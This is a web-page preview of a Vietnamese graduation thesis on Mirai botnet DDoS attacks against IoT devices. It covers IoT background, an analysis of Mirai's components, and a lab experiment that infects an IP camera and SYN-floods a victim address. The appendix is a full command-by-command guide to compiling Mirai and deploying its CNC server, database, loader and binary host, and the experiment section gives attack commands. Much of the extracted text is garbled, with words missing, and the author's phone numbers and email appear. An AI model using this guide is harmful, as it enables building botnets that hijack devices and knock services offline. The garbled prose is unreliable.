Đồ án tốt nghiếp CNTT: Nghiên cứu tấn công DDOS với Botnet Mirai trên các thiết bị Internet of things (IoT)

50 1.3K 9
Đồ án tốt nghiếp CNTT: Nghiên cứu tấn công DDOS với Botnet Mirai trên các thiết bị Internet of things (IoT)

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

Thông tin tài liệu

Bài đồ án tốt nghiệp chuyên ngành CNTT gồm 50 trang, nói về hiện trạng sự kiện và nguy cơ tiềm ẩn của an toàn thông tin mạng, bản đẹp, được chuyển từ word, dễ dàng chỉnh sửa và tách trang làm tài liệu tham khảo. KHÔNG KHUYẾN KHÍCH COPY TOÀN BỘ. LỜI NÓI ĐẦU Internet of Things là cụm từ nhằm để chỉ các đối tượng có thể được nhận biết cũng như sự tồn tại của chúng và được Kenvin Ashton đưa ra năm 1999. Cho đến nay, mạng lưới vạn vật kết nối Internet là một kịch bản của thế giới hiện đại khi mà mỗi đồ vật, con người được cung cấp một định danh riêng và tất cả đều có khả năng truyền tải, trao đổi thông tin qua mạng mà không cần tương tác trực tiếp giữa người với người hay người với máy tính. Tóm lại, IoT là một tập hợp các thiết bị có khả năng kết nối với nhau, với Internet và với thế giới bên ngoài để thực hiện một công việc nào đó. Trong bối cảnh IoT bùng nổ như là một xu hướng mới trong tương lai đi kèm với những tiện ích thì cũng tiềm ẩn những mối nguy hại và trở thành mục tiêu hàng đầu của giới Hacker hiện đại. IoT có thể gây ảnh hưởng xấu nếu các thiết bị bảo mật kém có thể bị nhiễm mã độc và trở thành một zombie trong mạng botnet. Khi hacker điều khiển một lượng lớn thiết bị IoT sẽ dễ dàng tấn công DDoS đánh sập bất cứ thứ gì trên Internet với lượng dữ liệu khổng lồ. Cuối năm 2016, mã nguồn Mirai đã được công bố gây ra ảnh hướng lớn kèm theo vô vàn mối lo và cũng là lời cảnh báo với các sản phẩm IoT trong tương lai. Vì vậy đề tài được chọn khi thực hiện đồ án tốt nghiệp này là Nghiên cứu tấn công DDoS với botnet Mirai trên các thiết bị Internet of Things (IoT). Đồ án được thực hiện nhằm mục đích nghiên cứu cách thức hoạt động và mối nguy hiểm của mã nguồn botnet Mirai trên thiết bị IoT để từ đó đưa ra các giải pháp phòng chống.

BAN CƠ YẾU CHÍNH PHỦ HỌC VIỆN KỸ THUẬT MẬT Mà ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ ĐỀ CƯƠNG ĐỒ ÁN TỐT NGHIỆP NGHIÊN CỨU TẤN CÔNG DDOS VỚI BOTNET MIRAI TRÊN CÁC THIẾT BỊ INTERNET OF THINGS ( IoT ) Ngành: Công nghệ thông tin Chuyên ngành: An toàn thông tin Mã số: 52.48.02.01 Hà Nội, 2017 BAN CƠ YẾU CHÍNH PHỦ HỌC VIỆN KỸ THUẬT MẬT Mà ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ ĐỀ CƯƠNG ĐỒ ÁN TỐT NGHIỆP NGHIÊN CỨU TẤN CÔNG DDOS VỚI BOTNET MIRAI TRÊN CÁC THIẾT BỊ INTERNET OF THINGS ( IoT ) Ngành: Công nghệ thông tin Chuyên ngành: An toàn thông tin Mã số: 52.48.02.01 Sinh viên thực hiện: Nguyễn Thế Đạt Lớp: AT9A Người hướng dẫn : KS Nguyễn Mạnh Thắng Khoa An toàn thông tin – Học viện Kỹ thuật mật mã Mọi đóng góp trao đổi liên hệ: SĐT: 01699960595 0949423894 Mail: datnt2308@gmail.com Hà Nội, 2017 MỤC LỤC Danh mục kí hiệu viết tắt Danh mục hình vẽ Danh mục bảng Lời nói đầu Chương Tổng quan internet of things 1.1 Lịch sử hình thành phát triển Internet 1.2 Giới thiệt Internet of Things 10 1.2.1 Xu hướng phát triển 10 1.2.2 Ứng dụng thực tiễn 11 1.2.3 Những mối nguy hiểm tiềm ẩn 12 Chương Tổng quan công từ chối dịch vụ ddos 13 2.1 Tổng quan an ninh mạng 13 2.2 Tổng quan công từ chối dịch vụ 13 2.2.1 Giới thiệu công từ chối dịch vụ 13 2.2.2 Mô hình công từ chối dịch vụ 14 2.2.3 Xu hướng công từ chối dịch vụ tội phạm mạng 14 Chương Nghiên cứu mã nguồn botnet mirai 15 3.1 Giới thiệu Botnet Mirai 15 3.1.1 Thành phần cấu trúc Botnet Mirai 16 3.1.2 Cách thức điều khiển lây lan Bots: 17 3.2 Phân tích thành phần Botnet Mirai 17 3.2.1 Máy chủ CNC 17 3.2.2 Máy chủ Loader 22 3.2.3 Máy chủ Report 24 3.2.4 Mã độc 25 Chương Triển khai thực nghiệm botnet mirai trÊn cÁc thiết bị iot 30 4.1 Mô tả thực nghiệm 30 4.2 Thử nghiệm công 30 Kết luận 43 Tài liệu tham khảo 44 Phụ lục 45 DANH MỤC KÍ HIỆU VÀ VIẾT TẮT || Hoặc & Và Admin Administrator ARPANET Advanced Research Projects Agency Network Command And Control CNC DDoS Distributed Denial of Service IP Internet Protocol IoT Internet of Things Local Area Metwork LAN NII NSF National Information Infrastructure National Science Foundation MILNET Military Network TCP/IP Transmission Control Protocol/Internet Protocol DANH MỤC HÌNH VẼ Hình 1.1 Xu hướng phát triển IoT 10 Hình 3.1 Mirai sử dụng user-agent khác (mirai/bot/table.h) 15 Hình 3.2 Mirai sử dụng 10 kỹ thuật công từ chối dịch vụ (mirai/bot/attack.h) 16 Hình 3.3 Mô hình hoạt động logic thành phần 16 Hình 3.4 Cấu trúc thư mục mã nguồn 17 Hình 3.5 CNC lắng nghe kết nối (mirai/cnc/main.go) 18 Hình 3.6 CNC nhận thông tin bot admin (mirai/cnc/main.go) 19 Hình 3.7 Nhập username từ cmd 19 Hình 3.8 Nhập password từ cmd 19 Hình 3.9 Nhập password từ cmd 20 Hình 3.10 Thông báo đăng nhập thành công 20 Hình 3.11 Kiểm tra số lượng Bot connect tới CNC 20 Hình 3.12 Thêm cấu hình cho tài khoản 21 Hình 3.13 Hàm AttackInfoLookup 22 Hình 3.14 Thiết lập network card cho report server (loader/main.c) 22 Hình 3.15 Khởi tạo server chứa mã độc (loader/main.c) 23 Hình 3.16 Nhận ip, port, user, pass từ STDIN (loader/main.c) 23 Hình 3.17 Sử dụng busybox login lây mã độc (loader/server.c) 24 Hình 3.18 Lắng nghe kết nối cổng 48101 (scanListen.go) 24 Hình 3.20 Hiển thị thông tin thiết bị bruteforce (scanListen.go) 25 Hình 3.21 Che dấu tiến trình (mirai/bot/main.c) 26 Hình 3.22 Các phương thức công (mirai/bot/attack.c) 26 Hình 3.23 Kill cổng dịch vụ (mirai/bot/killer.c) 27 Hình 3.24 Ngăn cản thiết bị reboot lại (mirai/bot/main.c) 27 Hình 3.25 Tài khoản dùng để bruteforce IoT (mirai/bot/scanner.c) 28 Hình 3.26 Địa bruteforce thiết bị IoT (mirai/bot/scanner.c) 28 Hình 3.27 Bot gửi thông tin IoT bruteforce (mirai/bot/scanner.c) 28 Hình 3.28 Khai báo domain port server (mirai/bot/table.c) 29 Hình 4.1 Khởi chạy CNC Server 31 Hình 4.2 Cài đặt thông tin Database (cnc\main.c) 32 Hình 4.3 CNC đăng nhập Database (cnc\database.go) 32 Hình 4.4 Khởi chạy scanListen 32 Hình 4.5 Mở port 48101 chờ kết từ Bot 33 Hình 4.6 Nhập Bot cho Loader 33 Hình 4.7 Loader kết nối thiết bị IoT lây nhiễm Malware 34 Hình 4.8 Loader thực lây lan Malware 34 Hình 4.9 Attacker telnet tới CNC 35 Hình 4.10 Attacker đăng nhập CNC 36 Hình 4.11 Kiểm tra kết nối tới cổng 23 Bot hay Admin (cnc/main.go) 37 Hình 4.12 Loader hiển thị Bot kết nối thành công 38 Hình 4.13 Thông tin Bot scan thiết bị khác 39 Hình 4.14 Thông tin thiết bị mà Bot bruteforce thành công 40 Hình 4.15 Nhập lệnh công 40 Hình 4.16 Lệnh hacker dùng công 41 Hình 4.17 Thiết bị IoT IP Camera bị chiếm quyền kiểm soát 42 Hình 4.18 Victim bị Attacker công khiến lưu lượng tăng cao 42 DANH MỤC BẢNG Bảng Thành phần thực nghiệm 30 LỜI NÓI ĐẦU Internet of Things cụm từ nhằm để đối tượng nhận biết tồn chúng Kenvin Ashton đưa năm 1999 Cho đến nay, mạng lưới vạn vật kết nối Internet kịch giới đại mà đồ vật, người cung cấp định danh riêng tất có khả truyền tải, trao đổi thông tin qua mạng mà không cần tương tác trực tiếp người với người hay người với máy tính Tóm lại, IoT tập hợp thiết bị có khả kết nối với nhau, với Internet với giới bên để thực công việc Trong bối cảnh IoT bùng nổ xu hướng tương lai kèm với tiện ích tiềm ẩn mối nguy hại trở thành mục tiêu hàng đầu giới Hacker đại IoT gây ảnh hưởng xấu thiết bị bảo mật bị nhiễm mã độc trở thành zombie mạng botnet Khi hacker điều khiển lượng lớn thiết bị IoT dễ dàng công DDoS đánh sập thứ Internet với lượng liệu khổng lồ Cuối năm 2016, mã nguồn Mirai công bố gây ảnh hướng lớn kèm theo mối lo lời cảnh báo với sản phẩm IoT tương lai Vì đề tài chọn thực đồ án tốt nghiệp "Nghiên cứu công DDoS với botnet Mirai thiết bị Internet of Things (IoT)" Đồ án thực nhằm mục đích nghiên cứu cách thức hoạt động mối nguy hiểm mã nguồn botnet Mirai thiết bị IoT để từ đưa giải pháp phòng chống Mục tiêu đặt thực đồ án là: Xây dựng hệ thống botnet Nghiên cứu cách thức hoạt động hệ thống botnet Tìm hiểu số kỹ thuật coding thú vị mã nguồn Lây nhiễm mã độc lên thiết bị thật thực nghiệm công DDoS Nghiên cứu phát triển hạn chế mã nguồn Sau thời gian khoảng bốn tháng thực đồ án, mục tiêu đạt Tuy nhiên công DDoS IoT lĩnh vực khoa học phức tạp, thời gian thực đồ án tương đối ngắn nên chắn không tránh khỏi thiếu sót Rất mong góp ý thầy cô, bạn học viên để đồ án hoàn thiện CHƯƠNG TỔNG QUAN VỀ INTERNET OF THINGS 1.1 Lịch sử hình thành phát triển Internet Internet sinh mạng phát triển cho mục đích quân Mạng có tên ARPANET phát triển để thử nghiệm nghiên cứu quan dự án nghiên cứu nâng cao Bộ quốc phòng Mỹ (DARPA) vào năm 1969 nguồn gốc sinh Internet Vào thời đó, hệ thống máy tính chủ yếu hệ thống máy chủ trung tâm bị coi mong manh công tên lửa, công phá hủy thông tin Do vậy, ARPANET xây dựng thành dự án nghiên cứu để phân bổ thông tin hệ thống máy tính Ban đầu, với tốc độ truyền thấp 56 kbps hệ thống tạo nên viện nghiên cứu trường đại học Mỹ kết nối mạng gói Sau phát triển công nghệ tạo khả làm cho ARPANET đóng vai trò trung tâm mạng truyền thông gần 20 năm sau Giao thức truyền thông TCP/IP công nghệ tảng mà bỏ qua bạn nói phát triển Internet Bởi DARPA sử dụng TCP/IP giao thức chuẩn cho ARPANET, từ TCP/IP phát triển thành giao thức chuẩn Internet Rất nhiều đầu tư nghiên cứu phát triển công nghệ mạng LAN thực vào năm 1970 đóng góp nhiều vào phát triển Internet Vào năm 1983, phần mạng ARPANET phục vụ chủ yếu cho mục đích quân cắt bỏ (phần có tên MILNET (MILitary NETwork) phần lại mạng chuyển thành mạng phục vụ cho khoa học nghiên cứu TCP/IP chấp nhận giao thức truyền thông vào thời điểm Quĩ khoa học quốc gia Hoa Kỳ (NSF) xây dựng vận hành hệ thống mạng độc lập có tên NSFNET vào năm 1986 Sau đó, NSFNET ARPANET liên nối để hình thành nên mẫu Internet giới (NSFNET hấp thu ARPANET vào năm 1990) Một yếu tố thiếu phát triển Internet thiết lập sở hạ tầng truyền thông tin Một người nhận tầm quan trọng việc xây dựng sở hạ tầng truyền thông phó tổng thống Mỹ đó, ông Al Gore, người đưa kế hoạch NII (kết cấu thông tin quốc gia) vào năm 1993 Kế hoạch tập trung vào việc nghiên cứu phát triển mạng siêu nhanh (cấp độ Gbps) việc toàn cầu hoá làm lẩy cò việc xây dựng kết cấu truyền thông tin Đến nay, máy tính cá nhân hỗ trợ giao thức TCP/IP, có lực xử lý cao đắt hơn, dẫn tới thực trạng công chúng dễ dàng kết nối Internet cách sử dụng máy tính cá nhân bình thường Điều khiến cho việc sử dụng Internet trở nên phổ biến công chúng 1.2 Giới thiệt Internet of Things 1.2.1 Xu hướng phát triển Với phát triển Internet, smartphone đặc biệt thiết bị cảm biến, Internet of Things trở thành xu hướng giới Internet of Things định nghĩa vật dụng có khả kết nối Internet Ý tưởng nhà thông minh vào nhà, mở khóa cửa, đèn tự động sáng chỗ đứng, điều hòa tự động điều chỉnh nhiệt độ, nhạc tự động bật để chào đón…những điều có phim khoa học viễn tưởng, dần trở thành thực với công nghệ Internet of Things Hình 1.1 Xu hướng phát triển IoT Ý tưởng an toàn giao thông thực hóa giải pháp mạng cảm biến phương tiện Mạng cảm biến phương tiện tạo nên nhiều phương tiện có tính giao tiếp V2V để giúp truyền nhận thông tin để phương tiện khác nhận biết dự đoán tình chưa xảy Sau đó, trí tuệ nhân tạo mà phương tiện tự điều khiển cảnh báo cho người dùng 10 Hình 4.10 Attacker đăng nhập CNC IP Attacker: 14.177.140.96 IP CNC: 203.162.130.69 Attacker telnet đăng nhập CNC Attacker sử dụng user/pass hacker/hacker đăng nhập công Sau follow tcp ta thấy string tương ứng với tài khoản đăng nhập hacker/hacker thông tin số lượng Bot connect tới CNC Phân tích source code: 36 Hình 4.11 Kiểm tra kết nối tới cổng 23 Bot hay Admin (cnc/main.go) Dòng 66: Nếu nhận bytes \x00\x00\x00\x01 => Bot connect CNC Ngược lại, Admin connect CNC Bước Kiểm tra trạng thái Loader Server, Bot, Report Server Kiểm tra trạng thái Loader Server, Bot, Report Server sau lây nhiễm Malware Loader Server: 37 Hình 4.12 Loader hiển thị Bot kết nối thành công Như Bot có IP 61.222.7.176, port 23, tài khoản admin/1111, kiến trúc arm7 Và đặc biệt Bot có tiện ích Busybox sử dụng lệnh Wget Wget nói từ trước giúp thiết bị tải Malware từ Wget Server Bot: 38 Hình 4.13 Thông tin Bot scan thiết bị khác Ngay sau lây nhiễm Malware vào thiết bị Bot sẽ:  Tự kill tiến trình mở port 23 Bot nhằm không cho truy cập vào thiết bị qua port 23  Phân giải tên miền CNC  Kết nối tới CNC  Tự động bruteforce thiết bị khác đồng thời giữ kết nối với CNC  Gửi kết cho Report Server Report Server: 39 Hình 4.14 Thông tin thiết bị mà Bot bruteforce thành công Hiển thị thông tin thiết bị mà Bot bruteforce thành công Lưu ý: Source code Mirai, Bot dừng mức bruteforce mà chưa kiểm tra điều kiện để lây Malware thiết bị nên việc hoàn toàn nghĩa thiết bị phù hợp để lây Bot Loader server nơi kiểm tra điều kiện lây Malware scanListen Cần phân biệt điều này, điều kiện cần chưa đủ Bước Attacker công Victim Bước có nhiệm vụ: Hiển thị thông tin user đăng nhập số lượng Bot attack Nhập lệnh attack Gửi lệnh tới CNC Nhập lệnh công theo định dạng : [Flags] Ví dụ: syn 203.162.130.66 30 psh==1 syn 203.162.130.66 3600 ack==1 Hình 4.15 Nhập lệnh công 40 Lệnh Attacker gửi gửi sau: Attacker nhập lệnh công qua CMD -> CNC -> Bot -> Victim Hình 4.16 Lệnh hacker dùng công IP Attacker: 14.177.140.96 IP CNC: 203.162.130.69 IP Victim: 203.162.130.87 Command: syn 203.162.130.87 20 psh==1 Attacker công Victim Syn Flood có Flag Push vòng 20s Bước Kiểm tra kết 41 Hình 4.17 Thiết bị IoT IP Camera bị chiếm quyền kiểm soát Hình 4.18 Victim bị Attacker công khiến lưu lượng tăng cao Bot liên tục gửi gói tin công Victim vòng 20s Tuy nhiên, số lượng gói tin Victim phải hứng chịu lớn 42 KẾT LUẬN Bốn chương đồ án thể mục tiêu đặt thực đồ án đạt Cụ thể: Chương giới thiệu tổng quan Internet of Things Chương với xu hướng ứng dụng thực tiễn IoT tồn mối nguy hiểm tiềm ẩn Trong đó, mối nguy hiểm lớn hot Botnet IoT Chương nối tiếp chương nói cụ thể nguy hiểm công từ chối dịch vụ xu hướng sử dụng Botnet IoT vào công DDoS kim nam cho công mạng mà hacker đương đại nhắm đến Chương xem xét thành phần cấu trúc mã nguồn Mirai Đồng thời cụ thể hóa kỹ thuật ý tưởng xây dựng Botnet Mirai tác giả thông qua phân tích đoạn mã Theo đó, phân tích nhược điểm thiếu sót mã nguồn Những nhược điểm lộ rõ em triển khai khắc phục Trong chương 4, thực nghiệm mô tả trình xây dựng thực tế hệ thống thiết bị thật Mô hình triển khai cụ thể hóa thành phần mã nguồn, cách chúng kết hợp tương tác Từ đó, hiểu rõ hệ thống Botnet Mirai nói riêng hệ thống Botnet giới nói chung Dù vậy, số vấn đề liên quan Trước hết, đồ án đề cập đến việc sử dụng bruteforce mà chưa sâu vào việc ứng dụng lỗ hổng zero-day, CVE công bố để khai thác thiết bị IoT chưa đủ thời gian để nghiên cứu thêm Mã nguồn tác giả có số thiếu sót việc biên dịch sang x86 dẫn đến lỗi chạy tảng Dù em cố gắng chỉnh sửa biên dịch lại chưa thành công Việc giải điểm tồn hướng phát triển tương lai đồ án 43 TÀI LIỆU THAM KHẢO [1] GSM Accociation, IoT Security Guidelines Overview Document Version 1.1, November 07, 2016 [2] Mirai DDoS Botnet: Source Code & Binary Analysis, http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binaryanalysis/ [3] Octave Klaba, This botnet with 145607 cameras/dvr (1-30Mbps per IP) is able to send >1.5Tbps DDoS Type: tcp/ack, tcp/ack+psh, tcp/syn.“ [4] Brian Krebs; Krebs on Security, 1.10.2016: „Source Code for IoT Botnet ‘Mirai’ Released“: https://krebsonsecurity.com/2016/10/source-code-for-iotbotnet-mirai-released/ [5] Word’s Largest Net: Mirai Botnet, https://hackforums.net/showthread.php?tid=5420472 44 PHỤ LỤC Các bước cài đặt hệ thống Botnet Mirai: #Update Sources.list in /etc/apt/sources.list deb http://http.kali.org/kali kali-rolling main contrib non-free deb-src http://http.kali.org/kali kali-rolling main contrib non-free deb http://old.kali.org/kali sana main non-free contrib deb-src http://old.kali.org/kali sana main non-free contrib #Update Repo apt-get update #Requirements apt-get install gcc golang electric-fence mysql-server mysql-client #Git Clone Mirai Source Code cd /home/mirai mkdir ddos/ cd ddos/ apt-get install git git clone https://github.com/jgamblin/Mirai-Source-Code.git cd Mirai-Source-Code/mirai export PATH=$PATH:/usr/local/go/bin export GOPATH=/home/mirai/go go get github.com/go-sql-driver/mysql go get github.com/mattn/go-shellwords mkdir /etc/xcompile cd /etc/xcompile wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compilerarmv4l.tar.bz2 wget http://distro.ibiblio.org/slitaz/sources/packages/c/cross-compilerarmv5l.tar.bz2 wget http://distro.ibiblio.org/slitaz/sources/packages/c/cross-compilerarmv6l.tar.bz2 45 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compileri586.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compilerm68k.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compilermips.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compilermipsel.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compilerpowerpc.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compilersh4.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compilersparc.tar.bz2 tar -jxf cross-compiler-armv4l.tar.bz2 tar -jxf cross-compiler-armv5l.tar.bz2 tar -jxf cross-compiler-armv6l.tar.bz2 tar -jxf cross-compiler-i586.tar.bz2 tar -jxf cross-compiler-m68k.tar.bz2 tar -jxf cross-compiler-mips.tar.bz2 tar -jxf cross-compiler-mipsel.tar.bz2 tar -jxf cross-compiler-powerpc.tar.bz2 tar -jxf cross-compiler-sh4.tar.bz2 tar -jxf cross-compiler-sparc.tar.bz2 rm *.tar.bz2 mv cross-compiler-armv4l armv4l mv cross-compiler-armv5l armv5l mv cross-compiler-armv6l armv6l mv cross-compiler-i586 i586 mv cross-compiler-m68k m68k mv cross-compiler-mips mips mv cross-compiler-mipsel mipsel mv cross-compiler-powerpc powerpc 46 mv cross-compiler-sh4 sh4 mv cross-compiler-sparc sparc # PUT THESE COMMANDS IN THE FILE ~/.bashrc # Cross compiler toolchains export PATH=$PATH:/etc/xcompile/armv4l/bin export PATH=$PATH:/etc/xcompile/armv5l/bin export PATH=$PATH:/etc/xcompile/armv6l/bin export PATH=$PATH:/etc/xcompile/i586/bin export PATH=$PATH:/etc/xcompile/m68k/bin export PATH=$PATH:/etc/xcompile/mips/bin export PATH=$PATH:/etc/xcompile/mipsel/bin export PATH=$PATH:/etc/xcompile/powerpc/bin export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin export PATH=$PATH:/etc/xcompile/sh4/bin export PATH=$PATH:/etc/xcompile/sparc/bin # Golang export PATH=$PATH:/usr/local/go/bin export GOPATH=/home/mirai/go cd /home/mirai/ddos/Mirai-Source-Code/mirai /build.sh debug telnet /build.sh debug telnet /debug/enc string edit file bot/table.c vi bot/table.c service mysql start mysql -u root CREATE DATABASE mirai; use mirai; CREATE TABLE `history` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `user_id` int(10) unsigned NOT NULL, 47 `time_sent` int(10) unsigned NOT NULL, `duration` int(10) unsigned NOT NULL, `command` text NOT NULL, `max_bots` int(11) DEFAULT '-1', PRIMARY KEY (`id`), KEY `user_id` (`user_id`) ); CREATE TABLE `users` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `username` varchar(32) NOT NULL, `password` varchar(32) NOT NULL, `duration_limit` int(10) unsigned DEFAULT NULL, `cooldown` int(10) unsigned NOT NULL, `wrc` int(10) unsigned DEFAULT NULL, `last_paid` int(10) unsigned NOT NULL, `max_bots` int(11) DEFAULT '-1', `admin` int(10) unsigned DEFAULT '0', `intvl` int(10) unsigned DEFAULT '30', `api_key` text, PRIMARY KEY (`id`), KEY `username` (`username`) ); CREATE TABLE `whitelist` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `prefix` varchar(16) DEFAULT NULL, `netmask` tinyint(3) unsigned DEFAULT NULL, PRIMARY KEY (`id`), KEY `prefix` (`prefix`) ); exit mysqladmin -u root password root mysql -u root -p //dang nhap password mysql : root GRANT ALL ON mirai.* TO 'root'@'127.0.0.1'; GRANT ALL ON mirai.* TO 'root'@'localhost'; use mirai; 48 INSERT INTO users VALUES (NULL, 'hacker', 'hacker', 0, 0, 0, 0, -1, 1, 30, ''); exit cd cnc/ leafpad main.go password database : root port 3306 cd copy file prom.pt vao cnc export PATH=$PATH:/etc/xcompile/armv4l/bin export PATH=$PATH:/etc/xcompile/armv5l/bin export PATH=$PATH:/etc/xcompile/armv6l/bin export PATH=$PATH:/etc/xcompile/i586/bin export PATH=$PATH:/etc/xcompile/m68k/bin export PATH=$PATH:/etc/xcompile/mips/bin export PATH=$PATH:/etc/xcompile/mipsel/bin export PATH=$PATH:/etc/xcompile/powerpc/bin export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin export PATH=$PATH:/etc/xcompile/sh4/bin export PATH=$PATH:/etc/xcompile/sparc/bin # Golang export PATH=$PATH:/usr/local/go/bin export GOPATH=/home/mirai/go go get github.com/go-sql-driver/mysql go get github.com/mattn/go-shellwords /build.sh debug telnet /build.sh release telnet #dlr cd /home/mirai/ddos/Mirai-Source-Code/dlr edit main.c => IP HTTP Server comment /build.sh: line 3: i686-gcc: command not found /build.sh: line 16: i686-strip: command not found #DLR build 49 # apt-get update && apt-get upgrade apt-get install build-essential Replace i686-gcc with gcc, i686-strip with strip and try again /build.sh copy dlr vao bin cua loader chmod 777 build.sh export PATH=$PATH:/etc/xcompile/armv4l/bin export PATH=$PATH:/etc/xcompile/armv5l/bin export PATH=$PATH:/etc/xcompile/armv6l/bin export PATH=$PATH:/etc/xcompile/i586/bin export PATH=$PATH:/etc/xcompile/m68k/bin export PATH=$PATH:/etc/xcompile/mips/bin export PATH=$PATH:/etc/xcompile/mipsel/bin export PATH=$PATH:/etc/xcompile/powerpc/bin export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin export PATH=$PATH:/etc/xcompile/sh4/bin export PATH=$PATH:/etc/xcompile/sparc/bin /build.sh cd release/ cp * / /loader/bins/ cd / /loader/src/ leafpad main.c #edit tftp,wget,bind address cd ./build.debug.sh /build.sh mkdir /var/www/html/bins cd /home/mirai/ddos/Mirai-Source-Code/mirai/ cp -R release/mirai.* /var/www/html/bins cp -R release/miraint.* /var/www/html/bins cp prompt.txt release/ cd release/ /cnc 50 ... MẬT Mà ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ ĐỀ CƯƠNG ĐỒ ÁN TỐT NGHIỆP NGHIÊN CỨU TẤN CÔNG DDOS VỚI BOTNET MIRAI TRÊN CÁC THIẾT BỊ INTERNET OF THINGS ( IoT ) Ngành: Công nghệ thông tin Chuyên ngành: An toàn thông tin... nguồn Mirai công bố gây ảnh hướng lớn kèm theo mối lo lời cảnh báo với sản phẩm IoT tương lai Vì đề tài chọn thực đồ án tốt nghiệp "Nghiên cứu công DDoS với botnet Mirai thiết bị Internet of Things. .. NGUỒN BOTNET MIRAI 3.1 Giới thiệu Botnet Mirai Đây loại botnet không xây dựng để điều khiển máy tính mà hướng đến thiết bị IoT (Internet of Things) Mirai thực rà quét dải mạng IPv4 nhằm tìm kiếm thiết

Ngày đăng: 03/04/2017, 08:01

Từ khóa liên quan

Tài liệu cùng người dùng

  • Đang cập nhật ...

Tài liệu liên quan